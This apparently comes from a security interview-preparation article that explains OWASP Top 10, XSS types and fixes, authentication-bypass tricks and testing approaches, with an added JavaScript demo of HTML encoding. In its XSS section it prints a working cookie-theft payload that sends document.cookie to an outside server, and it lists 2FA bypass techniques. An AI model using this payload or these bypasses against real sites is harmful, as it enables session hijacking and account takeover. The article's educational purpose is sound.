1. What is OWASP Top 10?
OWASP (Open Web Application Security Project) Top 10 is a list of the most common web application vulnerability categories, used to identify web application based attacks.
In total it lists and describes the 10 most common web app based attacks.
It was first updated in 2013 and then in 2017, and the 2017 version is still the one in use today.
2. What are the changes between the 2013 and 2017 versions?
There are 4 major changes:
1. IDOR (Insecure Direct Object References) and MFLAC (Missing Function Level Access Control) were merged into BAC (Broken Access Control).
2. XXE (XML External Entities) was added in 2017.
3. Insecure Deserialization was added in 2017.
4. Insufficient Logging and Monitoring was added in 2017.
3. What is your favourite OWASP Top 10 vulnerability?
You can name any one or two bugs from the OWASP Top 10; the example below is XSS.
There are 3 types: Reflected, Stored, DOM.
Reflected: if a payload injected into the web application is reflected back and executed in the response, it is reflected XSS.
Stored: if a payload injected into the web application is stored by the application and then executed when the user's page is loaded, it is stored XSS.
Document Object Model: if a payload injected into the web application enters through a DOM source and ends up in a DOM sink, it is DOM based XSS.
In this case the vulnerable sinks are: innerHTML, document.location, document.domain.
If alert is blocked, then confirm, prompt or print can be used in the payload instead.
4. What can be achieved by XSS?
2. Also, we can use a document.cookie payload, which returns the cookie; the payload sends the cookie to the attacker's server, so we can then read it from our server logs.
Final payload: <ScRipt>document.location.href="http://192.168.0.106:5000/?c="+document.cookie;</script>
Note: a screenshot of the victim machine can also be taken using XSS.
5. How will you fix/mitigate XSS?
By using HTML encoding. We will not rely on blacklisting payloads, because a blacklist is bypassed easily: we cannot write a regex strict enough to catch every variant.
Note: whitelisting input can also be used sometimes, but HTML encoding (or encoding that stops input from unbalancing the surrounding JS code) should always be implemented.
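An added example (not code from the original article) in JavaScript showing the point above: a blacklist filter that the mixed-case <ScRipt> tag from the payload earlier slips straight past, next to output-time HTML encoding that neutralises it. Function names and the sample input are constructed for this illustration.

```javascript
// Added example (not from the article): why a blacklist filter is a weak
// XSS defence and how output-time HTML encoding removes the problem.
// Function names and the sample input are constructed for this demo.

// Naive blacklist: drops input containing the literal lowercase tag.
// The mixed-case "<ScRipt>" used in the payload above never matches it.
function blacklistFilter(input) {
  return input.includes("<script>") ? "" : input;
}

// The characters that can change HTML context and their entity forms.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// HTML-encode untrusted text; apply at output time, in an HTML text or
// quoted-attribute context (a JS or URL context needs its own encoder).
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the (blacklist-filtered) value is concatenated into HTML.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${blacklistFilter(comment)}</p>`;
}

// Hardened rendering: same template, but the value is encoded on output.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Crude detector used only to make the difference visible: does the
// rendered HTML still contain a literal script tag?
function containsScriptTag(html) {
  return /<\s*script/i.test(html);
}

// Constructed sample using the article's mixed-case tag.
const sample = "<ScRipt>alert(1)</script>";

console.log(renderCommentUnsafe(sample)); // tag survives the blacklist
console.log(renderCommentSafe(sample));   // tag is rendered as inert text
```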
6. What is Authentication Bypass? Give some insights.
An attacker bypasses the username/password check or the authentication/login flow of the website. It is considered a dangerous, high-severity attack because it gives full access to any user's account.
Different types of Auth Bypass:
1. Login Bypass: the username and password check itself is bypassed.
2. Response Manipulation: a value in the server response is changed (false to true, 0 to 1).
3. Status Code Manipulation: the response status is changed from 403 Forbidden to 200 OK.
4. OTP Bypass: done by brute forcing the OTP.
5. Captcha Bypass: done by response manipulation.
6. Code Leakage in JS File: rare, but some JS files may contain information about the 2FA code.
7. 2FA Code Reuse: the same code can be reused (the same code works for the same device) / serial OTPs.
8. No Brute-Force Protection: it is possible to brute-force a 2FA code of any length.
9. Missing 2FA Code Integrity Validation: a code issued for one user account can be used to bypass 2FA on another (I use my OTP to bypass your verification).
10. CSRF on 2FA Disabling: no CSRF protection on disabling 2FA, and no authentication confirmation either.
11. Password Reset Disables 2FA: 2FA gets disabled on password change/email change.
12. Bypass 2FA with null or 000000: enter "null" as the 2FA code -> enter 000000 as the 2FA code -> send an empty 2FA code.
7. What is the root cause of a clickjacking attack?
Clickjacking happens when the application does not send the X-Frame-Options header, so its pages can be framed by another site. Setting X-Frame-Options (or the Content-Security-Policy frame-ancestors directive, its modern equivalent) or using frame busters fixes the clickjacking issue.
8. What is the difference between SAST and DAST?
SAST stands for Static Application Security Testing and DAST for Dynamic Application Security Testing.
In SAST — we check the source code, i.e. do static analysis of the "code".
In DAST — we check the dynamic requests and responses sent between "client and server" while the application is running.
9. Black/White/Grey Box Testing
White Box: in this type of testing we have all the information about the target from the client. We know the underlying technology, IPs and other details such as the DB (database) version and architecture, and a walkthrough is provided to understand how the app works.
Grey Box: same as above, but only limited information is provided.
Black Box: we do not have much information about the target stack (technology etc.); only the IP address or domain name is given by the client. Bug bounty hunting can be considered black box testing.
Note: This is the first part of the article and there will be more upcoming parts with more questions.
Stay tuned and follow us for more:
Cyber Security School: https://learn.hacktify.in
Udemy: https://www.udemy.com/user/rohit-gautam-38/
Live Trainings: https://hacktify.in/#live_training-slider
LinkedIn: https://www.linkedin.com/company/hacktifycs